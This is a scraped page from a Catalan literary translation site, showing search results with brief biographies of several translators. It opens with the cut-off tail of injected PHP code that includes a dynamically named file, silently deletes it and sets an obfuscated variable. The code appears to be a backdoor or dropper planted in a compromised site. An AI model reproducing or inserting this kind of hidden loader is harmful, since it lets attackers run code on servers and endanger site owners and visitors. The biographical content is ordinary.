");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Traduccions de la literatura catalana
Facebook Twitter
Portada > L’espai dels traductors > Resultats de la cerca

Resultats de la cerca

Miquel Edo i Julià (Martorell, 1966) és professor de la Facultat de Traducció i d’Interpretació de la UAB. S’ha dedicat a l’estudi de la recepció i de la influència de la literatura italiana i ha col·laborat assíduament en la recepció actual d’aquesta, sobretot a partir de la traducció d’autors poc coneguts per a nosaltres.

Fragments
Imma Estany i Morros, nascuda el 1965 a Sant Guim de Freixenet, es dedica professionalment a la traducció des del 1998. Després de llicenciar-se en geografia i història per la UB i de treballar en l’àmbit de l’arqueologia durant uns anys, va emprendre els estudis de traducció a la UAB, on va obtenir un màster en traducció l’any 2000.

Fragments
Pilar Estelrich i Arce (Palma, 1952) és professora emèrita de la Facultat de Traducció i Interpretació de la Universitat Pompeu Fabra, on ha impartit docència en traducció general i literària de l’alemany i descripció i comparació de traduccions.

Fragments
Isabel Banal: Allez, 2004, figures d'escaiola, mocadors de fer farcells, maletes i bosses de viatge.
Cercador de traductors
A-B-C-D - E-F-G - H - I
J - K - L - M - N - O - P - Q - R
S-T-U-V-W-X-Y-Z
Amb el suport de: